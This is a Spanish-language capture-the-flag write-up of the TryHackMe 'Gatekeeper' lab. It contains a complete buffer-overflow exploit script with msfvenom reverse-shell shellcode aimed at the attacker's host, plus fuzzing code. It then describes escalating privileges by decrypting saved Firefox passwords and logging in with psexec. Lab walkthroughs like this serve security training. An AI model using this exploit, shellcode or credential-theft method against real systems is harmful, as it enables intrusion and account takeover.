---
title: "[ TRYHACKME ] GATEKEEPER"
date: 2021-03-28T13:17:53+02:00
draft: false
toc: false
---
# Enumeración

En la etapa de enumeración, vamos a escanear los puertos de la máquina para saber de que se puede tratar.

`scan IP (script para escanear puertos)`

`nmap -T4 -sS -sV IP`

![](https://i.imgur.com/1Zl0Yx8.jpg)

Gracias a esto escubrimos que se trata de una máquina Windows 7 y que en el puerto 31337 la máquina está trabajando en algo, vamos a ver que contiene.

`nc -nv IP 31337`

Podemos observar que cada vez que metemos un dato como por ejemplo "Juan", la máquina t va a responder "Hello Juan!!!". 

Gracias a esto sabemos que se trata de un Buffer Overflow donde al meterle muchos datos (como A*40), la máquina se va a colapsar. 

Esto lo veremos más adelante cuando esté corriendo el binario en Inmunity Debugger.

# Conexión

Vemos que en el puerto 3389 está corriendo el servidor samba, por lo tanto vamos a conectarnos.

`smbclient -L \\\IP\\`

![](https://i.imgur.com/54j1wkH.jpg)

Vamos a entrar a la carpeta Users para ver que contiene.

`smbclient \\\\IP\\Users`

![](https://i.imgur.com/txO5kPP.jpg)

Ya tenemos el archivo gatekeeper.exe en nuestra máquina Kali.

# Máquina Windows

Para seguir la room, tenemos que tener instalado Inmunity Debugger, mona y tener la versión de python 2.7.1.

Como sabemos que se trata de un Buffer Overflow, vamos a transferir el archivo de nuestra máquina Kali a nuestra máquina Windows (mejor que sea Win7 o anterior). Esto lo podemos hacer a través de smbserver.py.

Una vez esté transferido, vamos a abrirlo en Inmunity Debugger, el cual nos va a ayudar a explotar nuestro binario.

# Explotación

**LA IP DE LA ROOM HA CAMBIADO DEBIDO A QUE TUVE QUE HACER EL WRITE-UP EN 2 DIAS DIFERENTES**

Para comenzar la etapa explotación vamos a poner a correr el binario en Inmunity Debugger. Despues de este paso vamos a repetir el paso que dije en la enumeración: `nc -nv IP 31337`, le ponemos un input de A*40 y volvemos al binario para ver que ha pasado: correcto, ha colapsado.

Como no sabemos exactamente en que número de bytes colapsa, vamos a fuzear el binario. 

Volvemos a correr el binario y tiramos el comando:

> python fuzzer.py

Gracias a Victor Garcia vamos a crear el script de fuzzing, por aquí os dejo el video donde resuelve esta misma máquina.

Video: https://youtu.be/DFhQm8pxN_E

Fuzzer.py:

```
import socket, sys

ip = "ip de la máquina de Windows"
port = 31337
buffer = ['A']
counter = 100

while len(buffer) <= 10:
    buffer.append('A' * counter)
    counter = counter + 100

try:
    for string in buffer: 
        print("Fuzzing with %s bytes" % len(string)) 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send(string + "\r\n")
        s.recv(1024)
        print "Listo"
except:
    print("Could not connect to " + ip + ":" + str(port))
    sys.exit(0)
finally:
    s.close()
```

![](https://i.imgur.com/G67w08n.png)


Al tirarlo en nuestra máquina Kali hará que colapse el binario en 200 bytes, aproximandamente. Siempre tenemos que coger el número más grande.

Ahora que ya sabemos en cuantos bytes colapsa, vamos a tirar el siguiente comando en Kali para crear un único patrón, el cual gracias a él vamos a identificar el número exacto de bytes.

`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200`

![](https://i.imgur.com/xlQseNf.png)

EL output vamos a copiarlo en el siguiente archivo, en la variable 'buffer'.

bof.py:

```
#!/usr/bin/python
import sys, socket

ip = 'ip de la máquina Windows'
port = 31337
buffer = ""

try:
    print '[+] Sending buffer'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))  
    s.send(buffer + '\r\n')
    s.recv(1024)
except:
    print '[!] The program cant be reached'
    sys.exit(0)
finally:
    s.close()

```
Una vez lo tengamos listo, vamos a volver a correr el binario y a tirar el comando: 

> python bof.py

Esto va a colapsar el binario y nos va a mandar un EIP diferente a 41414141, en este caso es 39654138.

> Nota: 41 es "A" en lenguaje hexadecimal, 42 es "B" y 43 es "C".

Esta dirección de memoria vamos a utilizarla para sacar el número concreto de bytes.

En Inmunity Debugger vamos a escribir el comando:

`!mona patter_offset 39654138`

![](https://i.imgur.com/DGXxRGc.png)

Ahora que tenemos el número exacto de bytes, vamos a cambiar la variable del buffer de nuestro archivo bof.py.

`buffer = "A"*146 + "B"*4 + "C"*100`

Volvemos a reinicar el binario y tiramos el comando 'python bof.py'.

![](https://i.imgur.com/wnPohoe.jpg)

Vemos que ahora el valor de EIP ha cambiado a 42424242 y que hemos enviado la A, la B y la C (esto lo podemos ver en el stack o pila).

# Identificación de bad characters

En primer lugar tenemos que generar una lista en hexadecimal con los carácteres ASCII de 0 a 255. Por aquí os dejo el archivo que los genera:

badchars.py:

```
from __future__ import print_function

for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')

print()
```

Tiramos el comando 'python badchars.py' y pasamos el output a la variable badchars del archivo bof.py.

Así es como tendría que quedar el principio de nuestro archivo bof.py:

![](https://i.imgur.com/XEdB7sM.png)

Reiniciamos el binario y tiramos el comando, python bof.py.

Hemos vuelto a crashear el binario y en este caso tenemos que dumpear el valor de ESP y empezar a mirar el array de badchars volcado. 

![](https://i.imgur.com/YiEno8J.png)

Podemos observar que existe un 00 despues de un 09, el cual estaría mal, porque si observamos nuestra variable badchars, despues del \x09 va el \x0a.

![](https://i.imgur.com/wH8fvgd.png)

Por lo tanto vamos a eliminar el valor \x0a.

Volvemos a repetir el mismo proceso y podemos comprobar que ya nos aparece nuestro array sin problemas, en teoria ya nos ha interpretado todos los carácteres malos.

![](https://i.imgur.com/n3tyaGf.jpg)


En el caso de que hubiera más badchars, volveriamos a repetir todo el proceso de buscar y eliminar hasta que tuvieramos nuestro array dumpeado sin ningún problema, el cual tiene que llegar hasta el valor FF (de 0 a 255).

# Buscar instrucción de salto a ESP

Sabemos que en ESP está todo nuestro código malicioso y por lo tanto tenemos que movernos ahí para que se ejecute nuestro código.

Esto lo vamos a hacer mediante el comando, escrito en Inmunity:

`!mona jmp -r esp`

![](https://i.imgur.com/zpryggj.png)

Vemos que ha encontrado dos direcciones de memoria que tienen la instrucción: jmp esp.

Cogemos la primera dirección y vemos que está escrita en big endian, por lo tanto vamos a pasarla a little endian para pasarla a nuestro script.

![](https://i.imgur.com/hu8ZGVm.png)

Nuestro código quedaría así:

![](https://i.imgur.com/npooBZW.jpg)

# Generar nuestra shellcode

Tiramos el siguiente comando en Kali y copiamos su output:

`msfvenom -p windows/shell_reverse_tcp LHOST=<IP de kali> LPORT=443 EXITFUNC=thread -b "\x00\x0a" -f python`

Esto nos va a permitir abrir un intérprete de comandos, también conocido como shell.

Los NOPs que vamos a poner son: "\x90"*20, debido a que estos nos permiten que la ejecución continue hasta que se encuentre algo que ejecutar, actúa de protección para que no falle el exploit.

Así es como quedaría nuestro código en bof.py:

```
#!/usr/bin/python
import sys, socket

ip = 'ip de Windows'
port = 31337
buf =  b""
buf += b"\xda\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x52\xbf\x34"
buf += b"\x8f\x76\xe7\x83\xc6\x04\x31\x7e\x13\x03\x4a\x9c\x94"
buf += b"\x12\x4e\x4a\xda\xdd\xae\x8b\xbb\x54\x4b\xba\xfb\x03"
buf += b"\x18\xed\xcb\x40\x4c\x02\xa7\x05\x64\x91\xc5\x81\x8b"
buf += b"\x12\x63\xf4\xa2\xa3\xd8\xc4\xa5\x27\x23\x19\x05\x19"
buf += b"\xec\x6c\x44\x5e\x11\x9c\x14\x37\x5d\x33\x88\x3c\x2b"
buf += b"\x88\x23\x0e\xbd\x88\xd0\xc7\xbc\xb9\x47\x53\xe7\x19"
buf += b"\x66\xb0\x93\x13\x70\xd5\x9e\xea\x0b\x2d\x54\xed\xdd"
buf += b"\x7f\x95\x42\x20\xb0\x64\x9a\x65\x77\x97\xe9\x9f\x8b"
buf += b"\x2a\xea\x64\xf1\xf0\x7f\x7e\x51\x72\x27\x5a\x63\x57"
buf += b"\xbe\x29\x6f\x1c\xb4\x75\x6c\xa3\x19\x0e\x88\x28\x9c"
buf += b"\xc0\x18\x6a\xbb\xc4\x41\x28\xa2\x5d\x2c\x9f\xdb\xbd"
buf += b"\x8f\x40\x7e\xb6\x22\x94\xf3\x95\x2a\x59\x3e\x25\xab"
buf += b"\xf5\x49\x56\x99\x5a\xe2\xf0\x91\x13\x2c\x07\xd5\x09"
buf += b"\x88\x97\x28\xb2\xe9\xbe\xee\xe6\xb9\xa8\xc7\x86\x51"
buf += b"\x28\xe7\x52\xf5\x78\x47\x0d\xb6\x28\x27\xfd\x5e\x22"
buf += b"\xa8\x22\x7e\x4d\x62\x4b\x15\xb4\xe5\x7e\xea\xb4\xfc"
buf += b"\x16\xe8\xb8\xff\x5d\x65\x5e\x95\xb1\x20\xc9\x02\x2b"
buf += b"\x69\x81\xb3\xb4\xa7\xec\xf4\x3f\x44\x11\xba\xb7\x21"
buf += b"\x01\x2b\x38\x7c\x7b\xfa\x47\xaa\x13\x60\xd5\x31\xe3"
buf += b"\xef\xc6\xed\xb4\xb8\x39\xe4\x50\x55\x63\x5e\x46\xa4"
buf += b"\xf5\x99\xc2\x73\xc6\x24\xcb\xf6\x72\x03\xdb\xce\x7b"
buf += b"\x0f\x8f\x9e\x2d\xd9\x79\x59\x84\xab\xd3\x33\x7b\x62"
buf += b"\xb3\xc2\xb7\xb5\xc5\xca\x9d\x43\x29\x7a\x48\x12\x56"
buf += b"\xb3\x1c\x92\x2f\xa9\xbc\x5d\xfa\x69\xdc\xbf\x2e\x84"
buf += b"\x75\x66\xbb\x25\x18\x99\x16\x69\x25\x1a\x92\x12\xd2"
buf += b"\x02\xd7\x17\x9e\x84\x04\x6a\x8f\x60\x2a\xd9\xb0\xa0"
buffer = "A"*146 + "\xc3\x14\x04\x08" + "\x90"*20 + buf

try:
    print '[+] Sending buffer'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(buffer + '\r\n')
    s.recv(1024)
except:
    print '[!] The program cant be reached'
    sys.exit(0)
finally:
    s.close()
```
# Obtenemos la reverse shell
Volvemos a reiniciar el binario, ponemos el puerto 443 a la escucha y tiramos el comando 'python bof.py'.

![](https://i.imgur.com/GEfIfoX.jpg)

Listo, ya tendriamos nuestra reverse shell. Pero, estamos tirando el exploit contra nuestra máquina windows, por lo tanto vamos a cambiar el shellcode y la ip para tirarselo a la ip de la máquina de tryhackme.

Generamos otra shellcode con el mismo comando que antes pero ahora con la ip de openvpn y volvemos a repetir el proceso anterior (ponemos el puerto 443 a la escucha y tiramos el exploit).

![](https://i.imgur.com/PiBb3Oq.jpg)

Listo, ahora si que tenemos la reverse shell que estábamos buscando.

Ahora solo tenemos que hacer un type o un more y ya tendriamos la primera flag que nos pide (user.txt.txt):

`more user.txt.txt`

![](https://i.imgur.com/dU0aWc9.jpg)

# Escalada de privilegios

Nos dirigimos a la ruta tmp `cd %tmp%` para importar el archivo winPEAS.bat y realizar una enumeración a la máquina Windows de tryhackme para ver lo que nos encontramos.  

> Puedes descargar winPEAS gracias a este repositorio: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Transferimos gracias a smbserver.py a través del recurso compartido a, el archivo winPEAS.bat:

![](https://i.imgur.com/MAkVvWv.jpg)

Una vez que lo tenemos en la máquina, lo lanzamos.

> winPEAS.bat

Una vez que carga todo el output, nos vamos al apartado de INSTALLED SOFTWARE y vemos que está descargado el navegador 'Mozilla Firefox' cuando no viene por determinado en una máquina Windows.

Por lo tanto parece que la cosa pinta mejor cuando encontramos unos archivos sospechosos el cual están en el apartado de CREDENTIALS y parece que tienen relación directa con Firefox:

![](https://i.imgur.com/aMVg7WH.png)

Los 4 primeros archivos parecen sospechosos, sobre todo el que se llama key4.db. Vamos a moverlos a nuestra máquina y desencriptarlos gracias a la herramienta firefox_decrypt.py el cual podemos descargar a través del siguiente enlace: https://github.com/unode/firefox_decrypt

En primer lugar, nos dirigimos a la ruta en donde se encuentran y los movemos a nuestra máquina (**transferimos los 4 archivos debido a que la herramienta firefox_decrypt analiza de 4 en 4**).

Yo lo voy a hacer a través de smbserver.py, aunque tambien se puede a través de http.server, aquí te dejo una página donde explica todo lo relacionado a transferencia de archivos: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65

Una vez transferidos vamos a poner en marcha la tool firefox_decrypt:

![](https://i.imgur.com/Tvmvggx.png)

Ya tenemos la contraseña de mayor, el root de la máquina. Ya solo nos queda conectarnos a la máquina a través de psexec.py (nos va a permitir crear una shell a través de credenciales) y ya tendriamos la bandera de root.txt.txt:

![](https://i.imgur.com/IY3aeUT.jpg)

Existen más máquinas relacionadas a esta en tryhackme, como por ejemplo:

Brainstorm: https://tryhackme.com/room/brainstorm
Buffer Overflow Prep: https://tryhackme.com/room/bufferoverflowprep

Espero que os haya gustado.

Queria volver a dar las gracias Victor Garcia por aclararme más todo sobre el tema de la explotación de Buffer Overflow, podeis pasaros por su canal si quereis saber más sobre este tema.

Canal: https://www.youtube.com/channel/UCjNHFaBm_0-Mo749MB3A9cQ





















































